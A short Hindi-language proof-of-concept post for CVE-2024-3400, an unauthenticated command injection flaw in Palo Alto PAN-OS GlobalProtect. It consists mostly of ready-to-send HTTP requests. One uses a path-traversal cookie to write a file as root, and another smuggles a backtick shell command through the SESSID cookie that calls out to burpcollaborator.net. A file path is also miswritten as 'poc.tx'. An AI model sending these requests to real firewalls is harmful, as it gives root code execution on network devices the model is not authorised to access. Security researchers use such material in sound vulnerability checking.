
CVE-2024-3400 PAN-OS: ग्लोबलप्रोटेक्ट में OS कमांड इंजेक्शन भेद्यता
CVE-2024-3400 पालो अल्टो ओएस कमांड इंजेक्शन
विक्रेता विवरण GlobalProtect फीचर में एक कमांड इंजेक्शन भेद्यता, पालो अल्टो नेटवर्क्स PAN-OS सॉफ़्टवेयर के विशिष्ट PAN-OS संस्करणों और विशिष्ट फीचर कॉन्फ़िगरेशन के लिए, एक अप्रमाणित हमलावर को फ़ायरवॉल पर रूट विशेषाधिकारों के साथ मनमाना कोड निष्पादित करने में सक्षम बना सकती है।
watchtowr labs को बधाई 🚀
HTTP अनुरोध:
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
poc.txt को इस पथ /var/appweb/sslvpndocs/global-protect/portal/images/poc.tx पर रूट विशेषाधिकार के साथ बनाया जाना चाहिए।
यदि भेद्य है तो आपको poc.txt तक पहुंचने पर 403 प्राप्त होगा, 404 के बजाय।
GET /global-protect/portal/images/poc.txt HTTP/1.1
Host: 127.0.0.1
Connection: close
टेलीमेट्री सक्षम होनी चाहिए।
आप rce जांच के लिए Burp Collaborator का उपयोग कर सकते हैं।
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`hostname${IFS}burpcollaborator.net `;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0